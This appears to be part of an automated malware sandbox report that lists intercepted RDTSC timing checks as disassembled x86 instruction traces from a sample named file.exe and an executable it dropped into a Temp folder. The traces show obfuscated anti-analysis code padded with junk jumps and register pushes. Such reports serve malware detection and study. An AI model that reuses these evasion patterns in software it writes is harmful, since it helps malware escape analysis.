Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90793 second address: 4C907F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDE8C51D4E1h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test eax, eax 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 jmp 00007FDE8C51D4E4h 0x00000019 popad 0x0000001a jg 00007FDEFE4BB19Ah 0x00000020 pushad 0x00000021 mov ecx, 781F32EDh 0x00000026 jmp 00007FDE8C51D4DAh 0x0000002b popad 0x0000002c js 00007FDE8C51D577h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FDE8C51D4DAh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C907F3 second address: 4C90802 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90802 second address: 4C9083E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FDE8C51D4E3h 0x00000014 pop esi 0x00000015 mov dx, 598Ch 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C9083E second address: 4C90860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FDEFEE2910Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90860 second address: 4C90864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90864 second address: 4C90868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90868 second address: 4C9086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C9086E second address: 4C908FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c jmp 00007FDE8CE8B4D0h 0x00000011 lea eax, dword ptr [ebp-2Ch] 0x00000014 jmp 00007FDE8CE8B4D0h 0x00000019 xchg eax, esi 0x0000001a jmp 00007FDE8CE8B4D0h 0x0000001f push eax 0x00000020 jmp 00007FDE8CE8B4CBh 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 mov edx, esi 0x00000029 mov edx, eax 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov bl, 16h 0x00000032 pushfd 0x00000033 jmp 00007FDE8CE8B4D0h 0x00000038 and eax, 04556328h 0x0000003e jmp 00007FDE8CE8B4CBh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C908FA second address: 4C90900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90900 second address: 4C90904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90904 second address: 4C90908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90908 second address: 4C90917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ah, bh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90917 second address: 4C9093C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE8C51D4DDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C9093C second address: 4C9096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ax, 8273h 0x0000000f mov ax, D2CFh 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 movsx ebx, cx 0x00000019 call 00007FDE8CE8B4CCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90191 second address: 4C901A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C901A0 second address: 4C901A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C901A6 second address: 4C901AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C901AA second address: 4C901AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90D94 second address: 4C90E9E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDE8C51D4E6h 0x00000008 sbb cx, 2D98h 0x0000000d jmp 00007FDE8C51D4DBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FDE8C51D4E6h 0x0000001c push eax 0x0000001d jmp 00007FDE8C51D4DBh 0x00000022 xchg eax, ebp 0x00000023 jmp 00007FDE8C51D4E6h 0x00000028 mov ebp, esp 0x0000002a jmp 00007FDE8C51D4E0h 0x0000002f cmp dword ptr [76C8459Ch], 05h 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FDE8C51D4DEh 0x0000003d jmp 00007FDE8C51D4E5h 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007FDE8C51D4E0h 0x00000049 add ah, 00000018h 0x0000004c jmp 00007FDE8C51D4DBh 0x00000051 popfd 0x00000052 popad 0x00000053 je 00007FDEFE4AB07Ah 0x00000059 pushad 0x0000005a mov dl, ch 0x0000005c push eax 0x0000005d push edx 0x0000005e pushfd 0x0000005f jmp 00007FDE8C51D4E7h 0x00000064 or eax, 4BEF308Eh 0x0000006a jmp 00007FDE8C51D4E9h 0x0000006f popfd 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90E9E second address: 4C90EBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90EBA second address: 4C90EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90EBE second address: 4C90EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90EC2 second address: 4C90EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0084 second address: 4CA0096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0096 second address: 4CA009A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA009A second address: 4CA00C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FDEFEE10F96h 0x0000000d push 76C22B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [76C84538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 jmp 00007FDE8CE8B4D7h 0x00000057 sub esi, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA00C6 second address: 4CA00D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0819 second address: 4CB082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB082F second address: 4CB0833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0833 second address: 4CB084E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB084E second address: 4CB0877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE8C51D4DFh 0x00000009 jmp 00007FDE8C51D4E3h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0877 second address: 4CB0893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8CE8B4D2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0893 second address: 4CB090A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FDE8C51D4E6h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov ebx, ecx 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FDE8C51D4E2h 0x0000001f adc cx, 64D8h 0x00000024 jmp 00007FDE8C51D4DBh 0x00000029 popfd 0x0000002a mov ecx, 638EFF8Fh 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007FDE8C51D4E5h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov bh, 4Ch 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB090A second address: 4CB09B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007FDE8CE8B4CEh 0x00000011 test esi, esi 0x00000013 jmp 00007FDE8CE8B4D0h 0x00000018 je 00007FDEFEDF8F3Bh 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FDE8CE8B4CEh 0x00000025 or eax, 19B92B28h 0x0000002b jmp 00007FDE8CE8B4CBh 0x00000030 popfd 0x00000031 mov eax, 41CA381Fh 0x00000036 popad 0x00000037 cmp dword ptr [76C8459Ch], 05h 0x0000003e jmp 00007FDE8CE8B4D2h 0x00000043 je 00007FDEFEE10FD4h 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007FDE8CE8B4CEh 0x00000050 xor cl, FFFFFFB8h 0x00000053 jmp 00007FDE8CE8B4CBh 0x00000058 popfd 0x00000059 popad 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB09B6 second address: 4CB09BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB09BA second address: 4CB09C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB09C0 second address: 4CB09C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB09FB second address: 4CB0A01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0A01 second address: 4CB0A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FDE8C51D4E0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dh, ah 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0A33 second address: 4CB0A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0A39 second address: 4CB0A57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edi 0x00000011 mov cx, bx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 55E437 second address: 55DCAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or dword ptr [ebp+122D252Eh], edx 0x00000012 push dword ptr [ebp+122D0BD1h] 0x00000018 sub dword ptr [ebp+122D3BCEh], ebx 0x0000001e call dword ptr [ebp+122D25E8h] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D283Dh], ecx 0x0000002b xor eax, eax 0x0000002d mov dword ptr [ebp+122D283Dh], edx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 add dword ptr [ebp+122D2802h], eax 0x0000003d sub dword ptr [ebp+122D2825h], edi 0x00000043 mov dword ptr [ebp+122D2D72h], eax 0x00000049 cld 0x0000004a mov esi, 0000003Ch 0x0000004f sub dword ptr [ebp+122D2825h], ecx 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 jmp 00007FDE8CE8B4CAh 0x0000005e clc 0x0000005f lodsw 0x00000061 jmp 00007FDE8CE8B4CAh 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jmp 00007FDE8CE8B4CCh 0x0000006f mov ebx, dword ptr [esp+24h] 0x00000073 jmp 00007FDE8CE8B4D1h 0x00000078 nop 0x00000079 jmp 00007FDE8CE8B4D7h 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007FDE8CE8B4CFh 0x00000086 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 55DCAC second address: 55DCB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E20D2 second address: 6E20F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDE8CE8B4CCh 0x0000000b jne 00007FDE8CE8B4C6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E20F1 second address: 6E2104 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDE8C51D4DAh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E23EB second address: 6E23EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E537E second address: 6E5382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E5382 second address: 6E5390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FDE8CE8B4C6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E5390 second address: 6E5394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E5394 second address: 6E53A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c jo 00007FDE8CE8B4CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E53A8 second address: 6E53C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8C51D4DEh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E53C4 second address: 6E53D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FDE8CE8B4C6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E53D8 second address: 55DCAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 and edi, 2AF72374h 0x0000000e push dword ptr [ebp+122D0BD1h] 0x00000014 cmc 0x00000015 call dword ptr [ebp+122D25E8h] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D283Dh], ecx 0x00000022 xor eax, eax 0x00000024 mov dword ptr [ebp+122D283Dh], edx 0x0000002a mov edx, dword ptr [esp+28h] 0x0000002e add dword ptr [ebp+122D2802h], eax 0x00000034 sub dword ptr [ebp+122D2825h], edi 0x0000003a mov dword ptr [ebp+122D2D72h], eax 0x00000040 cld 0x00000041 mov esi, 0000003Ch 0x00000046 sub dword ptr [ebp+122D2825h], ecx 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 jmp 00007FDE8C51D4DAh 0x00000055 clc 0x00000056 lodsw 0x00000058 jmp 00007FDE8C51D4DAh 0x0000005d add eax, dword ptr [esp+24h] 0x00000061 jmp 00007FDE8C51D4DCh 0x00000066 mov ebx, dword ptr [esp+24h] 0x0000006a jmp 00007FDE8C51D4E1h 0x0000006f nop 0x00000070 jmp 00007FDE8C51D4E7h 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007FDE8C51D4DFh 0x0000007d rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E54E0 second address: 6E54F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E5533 second address: 6E5538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E5538 second address: 6E5587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add edi, 67175A91h 0x00000012 push 00000000h 0x00000014 call 00007FDE8CE8B4D8h 0x00000019 pushad 0x0000001a mov di, dx 0x0000001d mov si, 7646h 0x00000021 popad 0x00000022 pop edi 0x00000023 push 00864FB4h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FDE8CE8B4D1h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E5587 second address: 6E564E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 00864F34h 0x0000000e push 00000003h 0x00000010 sbb dh, 00000031h 0x00000013 mov edi, 6B53D800h 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b or dword ptr [ebp+122D39ACh], eax 0x00000021 popad 0x00000022 push 00000003h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FDE8C51D4D8h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e jmp 00007FDE8C51D4DBh 0x00000043 jnc 00007FDE8C51D4D9h 0x00000049 call 00007FDE8C51D4D9h 0x0000004e jo 00007FDE8C51D4E2h 0x00000054 jmp 00007FDE8C51D4DCh 0x00000059 push eax 0x0000005a jmp 00007FDE8C51D4E5h 0x0000005f mov eax, dword ptr [esp+04h] 0x00000063 jmp 00007FDE8C51D4E2h 0x00000068 mov eax, dword ptr [eax] 0x0000006a jmp 00007FDE8C51D4E5h 0x0000006f mov dword ptr [esp+04h], eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jg 00007FDE8C51D4DCh 0x0000007b rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E564E second address: 6E5658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FDE8CE8B4C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E5658 second address: 6E565C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E56EC second address: 6E5755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007FDE8CE8B4DFh 0x00000011 push edx 0x00000012 jmp 00007FDE8CE8B4D7h 0x00000017 pop edx 0x00000018 nop 0x00000019 call 00007FDE8CE8B4CDh 0x0000001e jmp 00007FDE8CE8B4CBh 0x00000023 pop edx 0x00000024 jmp 00007FDE8CE8B4CEh 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D1D6Eh], edi 0x00000031 call 00007FDE8CE8B4C9h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b pop esi 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E5755 second address: 6E575F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDE8C51D4D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E575F second address: 6E577C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe RDTSC instruction interceptor: First address: 6E577C second address: 6E578A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
